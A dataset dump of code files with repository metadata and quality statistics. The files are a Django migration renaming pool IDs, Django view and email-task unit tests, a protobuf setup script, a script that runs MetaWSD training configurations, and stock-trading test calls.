hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
06b044378f90feabaafeebbaf6221ba63270d1c1
| 132
|
py
|
Python
|
service/delivery_optimization/__init__.py
|
Rolkarolka/IUM-delivery-optimization
|
6104010ca4218c432e78c426931a70541948ab88
|
[
"MIT"
] | null | null | null |
service/delivery_optimization/__init__.py
|
Rolkarolka/IUM-delivery-optimization
|
6104010ca4218c432e78c426931a70541948ab88
|
[
"MIT"
] | 3
|
2021-12-03T11:44:43.000Z
|
2021-12-03T11:45:12.000Z
|
service/delivery_optimization/__init__.py
|
Rolkarolka/IUM-delivery-optimization
|
6104010ca4218c432e78c426931a70541948ab88
|
[
"MIT"
] | null | null | null |
from service.delivery_optimization.Database import Database
from service.delivery_optimization.Models import ModelA, ModelB, Models
| 44
| 71
| 0.878788
| 16
| 132
| 7.125
| 0.5625
| 0.192982
| 0.333333
| 0.54386
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075758
| 132
| 2
| 72
| 66
| 0.934426
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ebfd341a50afc23e37dd8471b30971f9f5a8a537
| 4,569
|
py
|
Python
|
app/vendors/migrations/0026_pool_id_update.py
|
snakrani/discovery
|
99690f186a194cabef6a5d1ad18fca715be1e187
|
[
"CC0-1.0"
] | null | null | null |
app/vendors/migrations/0026_pool_id_update.py
|
snakrani/discovery
|
99690f186a194cabef6a5d1ad18fca715be1e187
|
[
"CC0-1.0"
] | null | null | null |
app/vendors/migrations/0026_pool_id_update.py
|
snakrani/discovery
|
99690f186a194cabef6a5d1ad18fca715be1e187
|
[
"CC0-1.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('vendors', '0025_auto_20180205_0342'),
]
operations = [
migrations.RunSQL("UPDATE vendors_pool SET id = 'OASIS_SB_1' WHERE id = '1_SB';"),
migrations.RunSQL("UPDATE vendors_poolpiid SET pool_id = 'OASIS_SB_1' WHERE pool_id = '1_SB';"),
migrations.RunSQL("UPDATE vendors_pool_naics SET pool_id = 'OASIS_SB_1' WHERE pool_id = '1_SB';"),
migrations.RunSQL("UPDATE vendors_pool SET id = 'OASIS_1' WHERE id = '1_UR';"),
migrations.RunSQL("UPDATE vendors_poolpiid SET pool_id = 'OASIS_1' WHERE pool_id = '1_UR';"),
migrations.RunSQL("UPDATE vendors_pool_naics SET pool_id = 'OASIS_1' WHERE pool_id = '1_UR';"),
migrations.RunSQL("UPDATE vendors_pool SET id = 'OASIS_SB_2' WHERE id = '2_SB';"),
migrations.RunSQL("UPDATE vendors_poolpiid SET pool_id = 'OASIS_SB_2' WHERE pool_id = '2_SB';"),
migrations.RunSQL("UPDATE vendors_pool_naics SET pool_id = 'OASIS_SB_2' WHERE pool_id = '2_SB';"),
migrations.RunSQL("UPDATE vendors_pool SET id = 'OASIS_2' WHERE id = '2_UR';"),
migrations.RunSQL("UPDATE vendors_poolpiid SET pool_id = 'OASIS_2' WHERE pool_id = '2_UR';"),
migrations.RunSQL("UPDATE vendors_pool_naics SET pool_id = 'OASIS_2' WHERE pool_id = '2_UR';"),
migrations.RunSQL("UPDATE vendors_pool SET id = 'OASIS_SB_3' WHERE id = '3_SB';"),
migrations.RunSQL("UPDATE vendors_poolpiid SET pool_id = 'OASIS_SB_3' WHERE pool_id = '3_SB';"),
migrations.RunSQL("UPDATE vendors_pool_naics SET pool_id = 'OASIS_SB_3' WHERE pool_id = '3_SB';"),
migrations.RunSQL("UPDATE vendors_pool SET id = 'OASIS_3' WHERE id = '3_UE';"),
migrations.RunSQL("UPDATE vendors_poolpiid SET pool_id = 'OASIS_3' WHERE pool_id = '3_UE';"),
migrations.RunSQL("UPDATE vendors_pool_naics SET pool_id = 'OASIS_3' WHERE pool_id = '3_UE';"),
migrations.RunSQL("UPDATE vendors_pool SET id = 'OASIS_SB_4' WHERE id = '4_SB';"),
migrations.RunSQL("UPDATE vendors_poolpiid SET pool_id = 'OASIS_SB_4' WHERE pool_id = '4_SB';"),
migrations.RunSQL("UPDATE vendors_pool_naics SET pool_id = 'OASIS_SB_4' WHERE pool_id = '4_SB';"),
migrations.RunSQL("UPDATE vendors_pool SET id = 'OASIS_4' WHERE id = '4_UR';"),
migrations.RunSQL("UPDATE vendors_poolpiid SET pool_id = 'OASIS_4' WHERE pool_id = '4_UR';"),
migrations.RunSQL("UPDATE vendors_pool_naics SET pool_id = 'OASIS_4' WHERE pool_id = '4_UR';"),
migrations.RunSQL("UPDATE vendors_pool SET id = 'OASIS_SB_5A' WHERE id = '5A_SB';"),
migrations.RunSQL("UPDATE vendors_poolpiid SET pool_id = 'OASIS_SB_5A' WHERE pool_id = '5A_SB';"),
migrations.RunSQL("UPDATE vendors_pool_naics SET pool_id = 'OASIS_SB_5A' WHERE pool_id = '5A_SB';"),
migrations.RunSQL("UPDATE vendors_pool SET id = 'OASIS_5A' WHERE id = '5A_UR';"),
migrations.RunSQL("UPDATE vendors_poolpiid SET pool_id = 'OASIS_5A' WHERE pool_id = '5A_UR';"),
migrations.RunSQL("UPDATE vendors_pool_naics SET pool_id = 'OASIS_5A' WHERE pool_id = '5A_UR';"),
migrations.RunSQL("UPDATE vendors_pool SET id = 'OASIS_SB_5B' WHERE id = '5B_SB';"),
migrations.RunSQL("UPDATE vendors_poolpiid SET pool_id = 'OASIS_SB_5B' WHERE pool_id = '5B_SB';"),
migrations.RunSQL("UPDATE vendors_pool_naics SET pool_id = 'OASIS_SB_5B' WHERE pool_id = '5B_SB';"),
migrations.RunSQL("UPDATE vendors_pool SET id = 'OASIS_5B' WHERE id = '5B_UR';"),
migrations.RunSQL("UPDATE vendors_poolpiid SET pool_id = 'OASIS_5B' WHERE pool_id = '5B_UR';"),
migrations.RunSQL("UPDATE vendors_pool_naics SET pool_id = 'OASIS_5B' WHERE pool_id = '5B_UR';"),
migrations.RunSQL("UPDATE vendors_pool SET id = 'OASIS_SB_6' WHERE id = '6_SB';"),
migrations.RunSQL("UPDATE vendors_poolpiid SET pool_id = 'OASIS_SB_6' WHERE pool_id = '6_SB';"),
migrations.RunSQL("UPDATE vendors_pool_naics SET pool_id = 'OASIS_SB_6' WHERE pool_id = '6_SB';"),
migrations.RunSQL("UPDATE vendors_pool SET id = 'OASIS_6' WHERE id = '6_UR';"),
migrations.RunSQL("UPDATE vendors_poolpiid SET pool_id = 'OASIS_6' WHERE pool_id = '6_UR';"),
migrations.RunSQL("UPDATE vendors_pool_naics SET pool_id = 'OASIS_6' WHERE pool_id = '6_UR';"),
]
| 65.271429
| 108
| 0.671044
| 662
| 4,569
| 4.291541
| 0.060423
| 0.118268
| 0.325238
| 0.428722
| 0.92925
| 0.913763
| 0.913763
| 0.896867
| 0.896867
| 0.839141
| 0
| 0.02774
| 0.203108
| 4,569
| 69
| 109
| 66.217391
| 0.752541
| 0.004596
| 0
| 0
| 0
| 0
| 0.644743
| 0.005059
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.04
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
230ca422bd63ad5deb3b952a715fa9ddfa7bb3f1
| 8,240
|
py
|
Python
|
dfirtrack_main/tests/systemuser/test_systemuser_views.py
|
blackhatethicalhacking/dfirtrack
|
9c2e13015291f2981d14d63c9683e7c447e91f3a
|
[
"MIT"
] | 4
|
2020-03-06T17:37:09.000Z
|
2020-03-17T07:50:55.000Z
|
dfirtrack_main/tests/systemuser/test_systemuser_views.py
|
blackhatethicalhacking/dfirtrack
|
9c2e13015291f2981d14d63c9683e7c447e91f3a
|
[
"MIT"
] | null | null | null |
dfirtrack_main/tests/systemuser/test_systemuser_views.py
|
blackhatethicalhacking/dfirtrack
|
9c2e13015291f2981d14d63c9683e7c447e91f3a
|
[
"MIT"
] | 1
|
2020-03-06T20:54:52.000Z
|
2020-03-06T20:54:52.000Z
|
from django.contrib.auth.models import User
from django.test import TestCase
from django.utils import timezone
from dfirtrack_main.models import System, Systemstatus, Systemuser
import urllib.parse
class SystemuserViewTestCase(TestCase):
""" systemuser view tests """
@classmethod
def setUpTestData(cls):
# create user
test_user = User.objects.create_user(username='testuser_systemuser', password='BXgnvXckpl1BS3I5ShJs')
# create object
systemstatus_1 = Systemstatus.objects.create(systemstatus_name='systemstatus_1')
# create object
system_1 = System.objects.create(
system_name='system_1',
systemstatus = systemstatus_1,
system_modify_time = timezone.now(),
system_created_by_user_id = test_user,
system_modified_by_user_id = test_user,
)
# create object
Systemuser.objects.create(systemuser_name='systemuser_1', system = system_1)
def test_systemusers_list_not_logged_in(self):
""" test list view """
# create url
destination = '/login/?next=' + urllib.parse.quote('/systemusers/', safe='')
# get response
response = self.client.get('/systemusers/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_systemusers_list_logged_in(self):
""" test list view """
# login testuser
login = self.client.login(username='testuser_systemuser', password='BXgnvXckpl1BS3I5ShJs')
# get response
response = self.client.get('/systemusers/')
# compare
self.assertEqual(response.status_code, 200)
def test_systemusers_list_template(self):
""" test list view """
# login testuser
login = self.client.login(username='testuser_systemuser', password='BXgnvXckpl1BS3I5ShJs')
# get response
response = self.client.get('/systemusers/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/systemuser/systemusers_list.html')
def test_systemusers_list_get_user_context(self):
""" test list view """
# login testuser
login = self.client.login(username='testuser_systemuser', password='BXgnvXckpl1BS3I5ShJs')
# get response
response = self.client.get('/systemusers/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_systemuser')
def test_systemusers_detail_not_logged_in(self):
""" test detail view """
# get object
systemuser_1 = Systemuser.objects.get(systemuser_name='systemuser_1')
# create url
destination = '/login/?next=' + urllib.parse.quote('/systemusers/' + str(systemuser_1.systemuser_id), safe='')
# get response
response = self.client.get('/systemusers/' + str(systemuser_1.systemuser_id), follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_systemusers_detail_logged_in(self):
""" test detail view """
# get object
systemuser_1 = Systemuser.objects.get(systemuser_name='systemuser_1')
# login testuser
login = self.client.login(username='testuser_systemuser', password='BXgnvXckpl1BS3I5ShJs')
# get response
response = self.client.get('/systemusers/' + str(systemuser_1.systemuser_id))
# compare
self.assertEqual(response.status_code, 200)
def test_systemusers_detail_template(self):
""" test detail view """
# get object
systemuser_1 = Systemuser.objects.get(systemuser_name='systemuser_1')
# login testuser
login = self.client.login(username='testuser_systemuser', password='BXgnvXckpl1BS3I5ShJs')
# get response
response = self.client.get('/systemusers/' + str(systemuser_1.systemuser_id))
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/systemuser/systemusers_detail.html')
def test_systemusers_detail_get_user_context(self):
""" test detail view """
# get object
systemuser_1 = Systemuser.objects.get(systemuser_name='systemuser_1')
# login testuser
login = self.client.login(username='testuser_systemuser', password='BXgnvXckpl1BS3I5ShJs')
# get response
response = self.client.get('/systemusers/' + str(systemuser_1.systemuser_id))
# compare
self.assertEqual(str(response.context['user']), 'testuser_systemuser')
def test_systemusers_add_not_logged_in(self):
""" test add view """
# create url
destination = '/login/?next=' + urllib.parse.quote('/systemusers/add/', safe='')
# get response
response = self.client.get('/systemusers/add/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_systemusers_add_logged_in(self):
""" test add view """
# login testuser
login = self.client.login(username='testuser_systemuser', password='BXgnvXckpl1BS3I5ShJs')
# get response
response = self.client.get('/systemusers/add/')
# compare
self.assertEqual(response.status_code, 200)
def test_systemusers_add_template(self):
""" test add view """
# login testuser
login = self.client.login(username='testuser_systemuser', password='BXgnvXckpl1BS3I5ShJs')
# get response
response = self.client.get('/systemusers/add/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/systemuser/systemusers_add.html')
def test_systemusers_add_get_user_context(self):
""" test add view """
# login testuser
login = self.client.login(username='testuser_systemuser', password='BXgnvXckpl1BS3I5ShJs')
# get response
response = self.client.get('/systemusers/add/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_systemuser')
def test_systemusers_edit_not_logged_in(self):
""" test edit view """
# get object
systemuser_1 = Systemuser.objects.get(systemuser_name='systemuser_1')
# create url
destination = '/login/?next=' + urllib.parse.quote('/systemusers/' + str(systemuser_1.systemuser_id) + '/edit/', safe='')
# get response
response = self.client.get('/systemusers/' + str(systemuser_1.systemuser_id) + '/edit/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_systemusers_edit_logged_in(self):
""" test edit view """
# get object
systemuser_1 = Systemuser.objects.get(systemuser_name='systemuser_1')
# login testuser
login = self.client.login(username='testuser_systemuser', password='BXgnvXckpl1BS3I5ShJs')
# get response
response = self.client.get('/systemusers/' + str(systemuser_1.systemuser_id) + '/edit/')
# compare
self.assertEqual(response.status_code, 200)
def test_systemusers_edit_template(self):
""" test edit view """
# get object
systemuser_1 = Systemuser.objects.get(systemuser_name='systemuser_1')
# login testuser
login = self.client.login(username='testuser_systemuser', password='BXgnvXckpl1BS3I5ShJs')
# get response
response = self.client.get('/systemusers/' + str(systemuser_1.systemuser_id) + '/edit/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/systemuser/systemusers_edit.html')
def test_systemusers_edit_get_user_context(self):
""" test edit view """
# get object
systemuser_1 = Systemuser.objects.get(systemuser_name='systemuser_1')
# login testuser
login = self.client.login(username='testuser_systemuser', password='BXgnvXckpl1BS3I5ShJs')
# get response
response = self.client.get('/systemusers/' + str(systemuser_1.systemuser_id) + '/edit/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_systemuser')
| 40
| 129
| 0.666626
| 863
| 8,240
| 6.158749
| 0.086906
| 0.052681
| 0.071119
| 0.069238
| 0.855315
| 0.826341
| 0.815992
| 0.808843
| 0.745437
| 0.737912
| 0
| 0.016828
| 0.221117
| 8,240
| 205
| 130
| 40.195122
| 0.811312
| 0.119539
| 0
| 0.488889
| 0
| 0
| 0.18046
| 0.026646
| 0
| 0
| 0
| 0
| 0.177778
| 1
| 0.188889
| false
| 0.144444
| 0.055556
| 0
| 0.255556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
2335b1ba4073e9cd36082cfcd46fb865f093a651
| 197
|
py
|
Python
|
init.py
|
Druthyn/carball
|
924ba75d2a60d069a5722a3d2a98814765d79197
|
[
"Apache-2.0"
] | null | null | null |
init.py
|
Druthyn/carball
|
924ba75d2a60d069a5722a3d2a98814765d79197
|
[
"Apache-2.0"
] | null | null | null |
init.py
|
Druthyn/carball
|
924ba75d2a60d069a5722a3d2a98814765d79197
|
[
"Apache-2.0"
] | null | null | null |
from utils.create_proto import create_proto_files
from utils.import_fixer import convert_to_relative_imports
if __name__ == "__main__":
create_proto_files()
convert_to_relative_imports()
| 24.625
| 58
| 0.822335
| 27
| 197
| 5.259259
| 0.518519
| 0.232394
| 0.225352
| 0.338028
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121827
| 197
| 7
| 59
| 28.142857
| 0.820809
| 0
| 0
| 0
| 0
| 0
| 0.040609
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
88c62b6c46ac5c235f354ed6a89d0d8c0a39c76b
| 75
|
py
|
Python
|
test.py
|
zhufuzz/All_Mighty_Reserve
|
87340b5c104d5f0bb2fcf6b08aeec0202b537d41
|
[
"Apache-2.0"
] | null | null | null |
test.py
|
zhufuzz/All_Mighty_Reserve
|
87340b5c104d5f0bb2fcf6b08aeec0202b537d41
|
[
"Apache-2.0"
] | null | null | null |
test.py
|
zhufuzz/All_Mighty_Reserve
|
87340b5c104d5f0bb2fcf6b08aeec0202b537d41
|
[
"Apache-2.0"
] | null | null | null |
from datetime import date
print date.today()
print date.today().timetuple()
| 25
| 30
| 0.786667
| 11
| 75
| 5.363636
| 0.636364
| 0.305085
| 0.474576
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093333
| 75
| 3
| 30
| 25
| 0.867647
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.333333
| null | null | 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
0036595cda9d7a6369d87248591f5f6182e42247
| 847
|
py
|
Python
|
scripts/generate_hslapknn_data.py
|
pborer/MetaWSD
|
6defd574030ec86e4f1d0b20702636895324e5c0
|
[
"MIT"
] | null | null | null |
scripts/generate_hslapknn_data.py
|
pborer/MetaWSD
|
6defd574030ec86e4f1d0b20702636895324e5c0
|
[
"MIT"
] | null | null | null |
scripts/generate_hslapknn_data.py
|
pborer/MetaWSD
|
6defd574030ec86e4f1d0b20702636895324e5c0
|
[
"MIT"
] | null | null | null |
import os
os.system('python MetaWSD/train_wsd.py --config MetaWSD/config/wsd/hslapknn/hslapknn_bert_4_cuda.yaml')
os.system('python MetaWSD/train_wsd.py --config MetaWSD/config/wsd/hslapknn/hslapknn_bert_8_cuda.yaml')
os.system('python MetaWSD/train_wsd.py --config MetaWSD/config/wsd/hslapknn/hslapknn_bert_16_cuda.yaml')
os.system('python MetaWSD/train_wsd.py --config MetaWSD/config/wsd/hslapknn/hslapknn_bert_32_cuda.yaml')
os.system('python MetaWSD/train_wsd.py --config MetaWSD/config/wsd/hslapknn/hslapknn_elmo_4_cuda.yaml')
os.system('python MetaWSD/train_wsd.py --config MetaWSD/config/wsd/hslapknn/hslapknn_elmo_8_cuda.yaml')
os.system('python MetaWSD/train_wsd.py --config MetaWSD/config/wsd/hslapknn/hslapknn_elmo_16_cuda.yaml')
os.system('python MetaWSD/train_wsd.py --config MetaWSD/config/wsd/hslapknn/hslapknn_elmo_32_cuda.yaml')
| 77
| 104
| 0.826446
| 138
| 847
| 4.84058
| 0.130435
| 0.095808
| 0.167665
| 0.251497
| 0.97006
| 0.97006
| 0.97006
| 0.97006
| 0.97006
| 0.97006
| 0
| 0.014778
| 0.041322
| 847
| 10
| 105
| 84.7
| 0.807882
| 0
| 0
| 0
| 0
| 0
| 0.854782
| 0.505313
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.111111
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
aebcc2256f4caffadbf0e9fa1318fc194d5dff1e
| 1,154
|
py
|
Python
|
stockze/example_app/utils/testing.py
|
vendari12/django-ai-algotrade
|
f20d2691f08ec75f148cd6409b886b1dd6edac78
|
[
"Apache-1.1"
] | null | null | null |
stockze/example_app/utils/testing.py
|
vendari12/django-ai-algotrade
|
f20d2691f08ec75f148cd6409b886b1dd6edac78
|
[
"Apache-1.1"
] | null | null | null |
stockze/example_app/utils/testing.py
|
vendari12/django-ai-algotrade
|
f20d2691f08ec75f148cd6409b886b1dd6edac78
|
[
"Apache-1.1"
] | null | null | null |
from environ import Env
from stockze.example_app.utils.crawl_earnings_whispers import CrawlEarningsWhispers
from stockze.example_app.utils.stockze_main import stockze_main
env = Env()
def test_one():
CrawlEarningsWhispers()
stockze_main(
buy_time=True, hold_time=False, sell_time=False
)
stockze_main(
buy_time=False, hold_time=True, sell_time=False
)
stockze_main(
buy_time=False, hold_time=False, sell_time=True
)
def test_two():
CrawlEarningsWhispers()
stockze_main(
buy_time=True, hold_time=False, sell_time=False
)
stockze_main(
buy_time=False, hold_time=True, sell_time=False
)
stockze_main(
buy_time=False, hold_time=False, sell_time=True
)
def test_three():
stockze_main(
buy_time=True, hold_time=False, sell_time=False
)
stockze_main(
buy_time=False, hold_time=True, sell_time=False
)
stockze_main(
buy_time=False, hold_time=False, sell_time=True
)
def test_four():
stockze_main(
buy_time=True, hold_time=False, sell_time=False
)
| 24.041667
| 83
| 0.666378
| 150
| 1,154
| 4.793333
| 0.166667
| 0.250348
| 0.194715
| 0.250348
| 0.827538
| 0.755216
| 0.755216
| 0.755216
| 0.755216
| 0.755216
| 0
| 0
| 0.2513
| 1,154
| 47
| 84
| 24.553191
| 0.832176
| 0
| 0
| 0.55
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.075
| 0
| 0.175
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
aefde33136c007503349320dce19f4fb9567ae2a
| 15,443
|
py
|
Python
|
register/tests/test_tasks.py
|
douglatornell/randopony
|
d47b10a23cb426da79284fb7fa8c968825ee8915
|
[
"BSD-3-Clause"
] | null | null | null |
register/tests/test_tasks.py
|
douglatornell/randopony
|
d47b10a23cb426da79284fb7fa8c968825ee8915
|
[
"BSD-3-Clause"
] | 2
|
2020-06-18T21:42:02.000Z
|
2020-06-18T21:42:03.000Z
|
register/tests/test_tasks.py
|
douglatornell/randopony
|
d47b10a23cb426da79284fb7fa8c968825ee8915
|
[
"BSD-3-Clause"
] | null | null | null |
"""Asynchronous (celeryd) task tests for RandoPony register app.
"""
# Standard library:
from datetime import date
# Django:
import django.test
from django.conf import settings
from django.core import mail
class TestEmailToRider(django.test.TestCase):
"""Unit tests for email_to_rider task function.
"""
fixtures = ['brevets.yaml', 'riders.yaml',
'email_addresses.yaml', 'links.yaml']
def _get_target_function(self):
from ..tasks import email_to_rider
return email_to_rider
def _send_one(self, *args, **kwargs):
self._get_target_function()(*args, **kwargs)
def test_email_subject(self):
"""email to rider has correct subject
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=400, date=date(2010, 5, 22))
rider = BrevetRider.objects.get(
first_name='Doug', last_name='Latornell', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertEqual(
mail.outbox[0].subject,
'Pre-registration Confirmation for LM400 22-May-2010 Brevet')
def test_email_to(self):
"""email to rider has correct to address
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=400, date=date(2010, 5, 22))
rider = BrevetRider.objects.get(
first_name='Doug', last_name='Latornell', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertEqual(
mail.outbox[0].to, ['djl@douglatornell.ca'])
def test_email_from(self):
"""email to rider has correct from address
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=400, date=date(2010, 5, 22))
rider = BrevetRider.objects.get(
first_name='Doug', last_name='Latornell', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertEqual(
mail.outbox[0].from_email, 'randopony@randonneurs.bc.ca')
def test_email_sender(self):
"""email to rider has correct sender address header
"""
from ..models import Brevet
